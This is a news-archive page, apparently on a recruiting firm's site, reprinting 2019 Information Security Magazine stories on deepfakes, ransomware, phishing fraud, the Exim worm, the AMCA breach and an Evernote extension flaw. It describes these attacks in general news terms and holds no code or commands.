Intelligent Connections. Recruiting Integrity.
Call Us: 415-510-2973

Archive for the News Category

US Lawmakers Hear Testimony on Concerns of Deepfakes

US Lawmakers Hear Testimony on Concerns of Deepfakes

Days after a video of a transformed Arnold Swartzenegger went viral on YouTube, members of the US House Intelligence Committee heard testimony on Thursday, June 13, on raising concerns about the threat of  "deepfakes," according to The Hill.

In his opening remarks, committee chairman Adam Schiff said, “Advances in AI and machine learning have led to the emergence of advanced digitally doctored media, so-called ‘deepfakes’ that allow malicious actors to foment chaos, division or crisis….Of great concern is that deepfakes could have the power to disrupt the democratic process, particularly the presidential race of 2020.”

Schiff noted that three years ago, lawmakers feared that falsified documents could be used to meddle in elections. “Three years later, we are on the cusp of a technological revolution that could enable even more sinister forms of deception.”

Of paramount concern is that foreign actors could use these deepfakes to spew misinformation through malicious campaigns intended to deceive the public or sway public opinion. Throughout the course of the more-than-two-hour hearing, the committee saw convincing examples of deepfakes and examples of synthetic pictures of people that don’t exist at all.

Former FBI special agent and senior fellow for Alliance for Securing Democracy at the German Marshall Fund Clint Watts was part of a four-person panel that testified before the lawmakers of the potential for foreign adversaries to craft synthetic media capabilities that could be used against the US.

“The falsification of audio and video allows manipulators to dupe audience members in highly convincing ways, provoking emotional responses that can lead to widespread mistrust,” Watts warned.

It’s not only lawmakers that are worried about the potential threat of deepfakes. In a June 13 blog post, Neiman Labs looked at myriad ways that deepfakes could be used to manipulate the outcome of an election, noting that “deepfakes have the potential to wreak havoc in contexts such as news, where audio and video are treated as a form of evidence that something actually happened.

“So-called 'cheapfakes,' such as the widely circulated clip of House Speaker Nancy Pelosi, have already demonstrated the potential for low-tech manipulated video to find a ready audience. The more advanced technology creates a whole new level of speed, scale, and potential for personalization of such disinformation.”

Source: Information Security Magazine

Malware a Serious Threat for Industrial Orgs

Malware a Serious Threat for Industrial Orgs

During Q1 2019, Cryptolocker malware spiked to account for 24% of all malware used, up from only 9% in Q4 2018, according to a new report from Positive Technologies.

“This malware is often used in combination with phishing, with hackers constantly inventing new ways of deceiving users and making them pay a ransom. Healthcare has proved to be a favorite target of cryptolockers. Medical institutions are more likely to pay a ransom compared to other businesses, perhaps because of patients' lives and health being at stake,” the report stated.

“Phishing remains an effective way of delivering malware. But email is far from the only channel of malware distribution. For example, users frequently download files from torrent trackers, on which the risk of malware infection grows exponentially. Under the guise of a movie, attackers distributed malware used for spoofing addresses of bitcoin and Ethereum wallets when the information is copied from the clipboard. Users also often download programs from official app stores.”

Also up during Q1 was the number of unique threats, which exceeded the numbers from Q1 of last year by 11%. The report noted an increasing number of cases of infection using multifunctional Trojans, with attackers most often hitting government agencies (16%), medical institutions (10%) and industrial companies (10%).

“Malware combining multiple types of Trojans is becoming more and more widespread. Due to its flexible modular architecture, this malware can perform many different functions. For example, it can display advertising and steal user data at the same time,” the report said.

While Cryptolocker malware has risen, the percentage of hidden mining has decreased to 7% from the previously reported 9% in Q4 2018.

“Hackers have started to upgrade miners, turning them into multifunctional Trojans. Once inside a system with low computational power on which mining is uneconomical, such Trojans start acting as spyware and steal data,” the report said. According to the research, cyber-criminals are using self-developed spyware or hacking government websites to steal data from governments.

Source: Information Security Magazine

Canadian City Fell Prey to a $375K Phish

Canadian City Fell Prey to a $375K Phish

Yet another city has fallen victim to a "a complex phishing email." The scam cost Burlington, Ontario, Canada, C$503,000 – the equivalent of nearly US$375,000.

“On Thursday, May 23, the City of Burlington discovered it was a victim of fraud. A single transaction was made to a falsified bank account as a result of a complex phishing email to City staff requesting to change banking information for an established City vendor. The transaction was in the form of an electronic transfer of funds made to the vendor…and was processed on May 16," the city announced.

Burlington immediately contacted law enforcement and a criminal investigation is underway, according to the announcement.  

“Cyber-attacks are on the rise, and phishing emails that involve the human factor are responsible for a great number of these breaches. Organizations globally are realizing the need to invest in employee training and deploy different training solutions in hope to mitigate the risk of data breaches,” said Shlomi Gian, CEO at CybeReady.

“Instead of increasing spending and IT effort, organizations should opt for smart solutions that guarantee change in employee behavior. Effective training should not become an IT and financial burden. Increased awareness might be the only way to reduce the risk of another incident like this in the foreseeable future.”

According to Global News Canada, none of Burlington’s systems have been impacted by the transaction. At this time, the city is not providing any additional information, but experts advise that all organizations continue to invest in their human capital via security training and awareness.

“Humans remain the weakest link in any organization. Properly implemented security controls can reduce the risk of human error but not eliminate it. Worse, cyber-criminals will now purposely target smaller organizations that cannot afford to invest in their cybersecurity,” said Ilia Kolochenko, founder and CEO of web security company ImmuniWeb.

Source: Information Security Magazine

Home Secretary Signs Assange US Extradition Request

Home Secretary Signs Assange US Extradition Request

The UK home secretary Sajid Javid has approved an extradition request from the US for WikiLeaks founder Julian Assange to be extradited.

The Tory leadership hopeful told BBC Radio 4’s Today program on Thursday that the controversial figure is one step closer to a trial on US soil, where he faces an 18-count indictment.

“He’s rightly behind bars. There’s an extradition request from the US that is before the courts tomorrow but yesterday I signed the extradition order and certified it and that will be going in front of the courts tomorrow,” said Javid.

“It is a decision ultimately for the courts, but there is a very important part of it for the home secretary and I want to see justice done at all times and we’ve got a legitimate extradition request, so I’ve signed it, but the final decision is now with the courts.”

The Department of Justice initially indicted Assange on hacking offenses related to Chelsea Manning’s alleged unauthorized access of Pentagon computers to access classified information.

However, that was superseded by a new 18-count court order detailing charges related to Assange’s publishing of that classified info, which it is alleged harmed national security.

The trove of hundreds of thousands of secret diplomatic cables and other documents relating to US wars in Afghanistan and Iraq contained unredacted names of US informants and diplomats in those countries, allegedly putting their physical safety at risk.

However, press freedom advocates have warned that the charges could set a dangerous precedent, given that WikiLeaks was acting in the public interest in revealing US military cover-ups such as the accidental shooting of two Iraqis working for Reuters news agency in 2007.

It’s also claimed that as Assange is not a US citizen and his crimes were not committed on US soil, he should not be facing extradition.

Former editor of the Guardian, Alan Rusbridger, claimed the charges are “attempting to criminalize things journalists regularly do as they receive and publish true information given to them by sources or whistleblowers.”

However, Assange has also been a controversial figure: his decision to publish private emails hacked by alleged Russian state spies from Democratic Party officials is said to have given Donald Trump a key advantage in the 2016 race for the White House.  

Source: Information Security Magazine

Millions of Email Servers at Risk from Cryptomining Worm

Millions of Email Servers at Risk from Cryptomining Worm

Researchers have spotted a major new cyber-attack campaign targeting millions of Linux email servers around the world with a cryptomining malware payload.

Exim accounts for over half (57%) of the globe’s internet email servers. Over 3.5 million are at risk from a vulnerability discovered last week, CVE-2019-10149, according to security vendor Cybereason.

There appears to be two waves of attack: the first involved attackers initially pushing out exploits from a command and control (C2) server on the clear web. However, the second seems to be more sophisticated.

“This is a highly pervasive campaign that installs cron jobs for persistence and downloads several payloads for different stages of the attack. In one of those stages, one of the payloads is a port scanner written in python. It looks for additional vulnerable servers on the internet, connects to them, and infects them with the initial script,” wrote Cybereason.

“In the attack, the attackers add an RSA authentication key to the SSH server which allows them to connect to the server as root and own it completely.”

Researchers are still working to assess the breadth of the campaign, but with worm-like capabilities in play, system administrators are urged to patch their Exim servers now, as well as find and remove any cron jobs.

“It is clear that the attackers went to great lengths to try to hide the intentions of their newly-created worm. They used hidden services on the TOR network to host their payloads and created deceiving windows icon files in an attempt to throw off researchers and even system administrators who are looking at their logs,” concluded Cybereason. 

“The prevalence of vulnerable Exim servers allows attackers to compromise many servers in a relatively short period of time, as well as generate a nice stream of cryptocurrency revenue.”

Source: Information Security Magazine

Employees Out of Work after ASCO Hit by Ransomware

Employees Out of Work after ASCO Hit by Ransomware

Nearly 1,000 employees in ASCO’s Zaventem, Belgium, office have been left incapable of doing their jobs after a ransomware attack crippled the aircraft-parts manufacturer, according to a June 11 report from vrt NWS.

“From the ISF’s standpoint, everyone who has access to an organization’s information and systems should be made aware of the risks from ransomware and the actions required to minimize those risks,” said Steve Durbin, managing director of the Information Security Forum.

“The bottom line is that if you can’t do without the information and you don’t have a backup, then paying is the only option you have left to recapture your data. Therefore, prevention is the way to go to better protect yourself.”

ASCO temporarily shut down operations at its headquarters in Zaventem in the aftermath of the attack, as was reported by Data News.

Spirit AeroSystems acquired ASCO, a Belgian organization, in 2018. Spirit AeroSystems reportedly said that it would also temporarily cease production in other countries, according to a June 13 post from Tripwire.

“Initially, ASCO merely disclosed that someone had hacked its servers. It did not supply additional details at that time….As of this writing, it’s unclear what ransomware family was responsible for the infection or how it gained access to ASCO’s network,” Tripwire’s David Bisson wrote.

“This latest ransomware attack against a critical supplier of airplane parts is another reminder on how destructive ransomware continues to be to organizations,” said Joseph Carson, chief security scientist at Thycotic.

“Ransomware, however, should be a lower risk to businesses if they follow common industry best practices such as the introduction of a solid incident response plan, backup and recovery practice, cybersecurity awareness training and strong privilege and access management controls to limit administrator access.”

“Supply chains are difficult to secure. They create risk that is hard to identify, complicated to quantify and costly to address. A compromise anywhere in the supply chain can have just as much impact on your business, your bottom line, and your reputation, as one from within the organization."

Source: Information Security Magazine

Gaming's All Fun and Games Till Someone Gets Hacked

Gaming's All Fun and Games Till Someone Gets Hacked

Cyber-criminals are playing games with the gaming industry according to two new reports published by Akamai and Kaspersky.  

The Akamai 2019 State of the Internet/Security Web Attacks and Gaming Abuse Report found that cyber-criminals have targeted the gaming industry by carrying out 12 billion credential-stuffing attacks against gaming websites, with a total of 55 billion credential-stuffing attacks across all industries within the 17-month period analyzed in the report (November 2017–March 2019).

SQL injection (SQLi) attacks account for 65% of all web application attacks, while local file inclusion (LFI) attacks only represent 24.7%, according to the report. As SQLi attacks have grown as an attack vector, the report found that the bridge between SQLi and credential-stuffing attacks is almost a direct line.

“One reason that we believe the gaming industry is an attractive target for hackers is because criminals can easily exchange in-game items for profit,” said Martin McKeay, security researcher at Akamai and editorial director of the State of the Internet/Security Report. “Furthermore, gamers are a niche demographic known for spending money, so their financial status is also a tempting target.”

In related news, research from Kaspersky confirmed that, unfortunately, more and more video games are being used to distribute malware to unsuspecting users. According to the research, more than 930,000 users were hit by malware attacks in the last 12 months, which cyber-criminals have achieved through crafting and distributing fake copies of popular video games, including "Minecraft," "Grand Theft Auto V" and "Sims 4."

Malware-disguised "Minecraft" accounted for around 30% of attacks, with over 310,000 users hit. Coming in at a distant second place was "Grand Theft Auto V," which targeted more than 112,000 users.

According to the researchers, criminals were also found trying to lure users into downloading malicious files pretending to be unreleased games. Spoofs of at least 10 pre-release games were seen, with 80% of detections focused on "FIFA 20," "Borderlands 3," and the "Elder Scrolls 6."

“For months now we see that criminals are exploiting entertainment to catch users by surprise – be it series of popular TV shows, premieres of top movies or popular video games,” said Maria Fedorova, security researcher at Kaspersky, in a press release.

“This is easy to explain: people can be less vigilant when they just want to relax and have fun. If they’re not expecting to find malware in something fun they’ve used for years, it won’t take an advanced-threat like infection vector to succeed. We urge everyone to stay alert, avoid untrusted digital platforms and suspicious-looking offers, install security software and perform a regular security scan of all devices used for gaming.”

Source: Information Security Magazine

AGs Warn ACMA Breach Impact Rose to over 20 Million

AGs Warn ACMA Breach Impact Rose to over 20 Million

After the data of more than 20 million patients was potentially exposed during the cyber-attack against American Medical Collection Agency (AMCA), the third-party collection agency for laboratories, hospitals, physician groups, medical providers and others, attorney generals (AGs) in such states as New Jersey, Illinois, Connecticut and Maryland have started alerting citizens and looking for answers to exactly what happened.

“The healthcare industry may be the most vulnerable of all industries to cyber-attacks. It's about the data healthcare operators have access to. In the AMCA cyber-heist, data stolen included patient PII [personally identifiable information] and lab test info but also included healthcare provider info, credit/debit card info, bank account info and social security numbers. This was a ‘treasure trove’ of data to a cyber-thief,” said Jonathan Deveaux, head of enterprise data protection at comforte AG.

The third-party data breach impacted both Quest Diagnostic and LabCorp, as well as BioReference Laboratories, CareCentrix and Sunrise Laboratories. According to LabCorp’s disclosure notice, “That information could include first and last name, date of birth, address, phone, date of service, provider, and balance information. AMCA’s affected system also included credit card or bank account information that was provided by the consumer to AMCA (for those who sought to pay their balance).”

Maryland AG Brian E. Frosh warned consumers to review their financial and medical records, according to WJZ-13. “Massive data breaches like the one experienced by the AMCA are extremely alarming, especially considering the likelihood that personal, financial, and medical information may now be in the hands of thieves and scammers,” Frosh told WJZ-13. “I strongly urge consumers to take steps to ensure that their information and personal identity is protected.”

Armed with this collection of patient data, criminals are in a good position to fraudulently collect money from those patients, according to Tim Erlin, VP, product management and strategy at Tripwire. “Imagine if you received an email with accurate details about a medical bill you actually have and a link to make a payment. It only takes a handful of people to fall for this scam in order for it to be worthwhile for the criminal.”

Source: Information Security Magazine

UK Orgs Lose 2.5 Months a Year on Poor Password Management

UK Orgs Lose 2.5 Months a Year on Poor Password Management

Businesses in the UK lose an average of two-and-a-half months per year in time spent dealing with poor password management, according to new research from OneLogin.

As detailed in its report Password Practices 2019, OneLogin surveyed 600 global IT professionals to gauge how companies are protecting passwords in terms of tools, guidelines and practices.

The key findings indicated that companies spend too much time resetting passwords that users have forgotten, believe they are dramatically safer than their password practices actually suggest and have failed to move quickly to adopt the tools that solve the password problem, like SSO, SAML, OAuth and MFA.

What's more, businesses are not heeding the latest password guidelines, Onelogin claimed, speci?cally regarding password rotation and checking passwords against lists of commonly-used passwords, compromised passwords and rainbow tables. Two thirds of those surveyed admitted they do not check passwords against common password lists and 78% do not check employee passwords against password complexity algorithms.

Thomas Pedersen, OneLogin’s chief technology officer and founder, said: “The benefits of innovative technology to facilitate modern business practices is clearly yet to be recognized by the average UK business overwhelmed by day-to-day password management processes. Trust must be built between businesses and B2B tech vendors, as a lot of businesses are stubbornly struggling in the dark and avoiding the topic of ‘digital transformation’ to free up employee and operational efficiencies.”

Pedersen urged businesses to streamline and simplify Identity and Access Management processes by implementing SSO and MFA tools.

“By doing so they will be freeing up skilled IT professionals to focus on tasks that drive greater business value and connect dispersed workforces. Organizations that don’t, may not survive the next two to five years. The quick adoption of automated tools is key to business survival.”

Source: Information Security Magazine

“Major Flaw” Discovered in Evernote’s Chrome Extension

“Major Flaw” Discovered in Evernote’s Chrome Extension

A major flaw has been discovered in the code of the Web Clipper Chrome extension of note-taking service Evernote.

The flaw, a universal XSS marked CVE-2019-12592 which could have allowed threat actors to extract personal information from the browser environment, was unearthed by security company Guardio and disclosed to Evernote in late May. Within a week, Evernote addressed the issue and rolled-out a complete fix.

According to Guardio: The logical coding error in the Web Clipper extension could have allowed an attacker to bypass the browser’s same origin policy, granting the attacker code execution privileges in Iframes beyond Evernote’s domain. As the browser’s domain-isolation mechanisms were broken, code could be executed that could allow an attacker to perform actions on behalf of the user as well as grant access to sensitive user information on affected third-party web pages and services, including authentication, financials, private conversations in social media, personal emails, and more.

Michael Vainshtein, CTO at Guardio, said: “The vulnerability we discovered is a testament to the importance of scrutinizing browser extensions with extra care. People need to be aware that even the most trusted extensions can contain a pathway for attackers. All it takes is a single unsafe extension to compromise anything you do or store online. The ripple effect is immediate and intense.”

The story highlights the importance of swift vulnerability disclosure, response and remediation, particularly given the fact that the flaw had the potential to affect any number of Evernote’s users (around 4,600,000 at the time of discovery).

Source: Information Security Magazine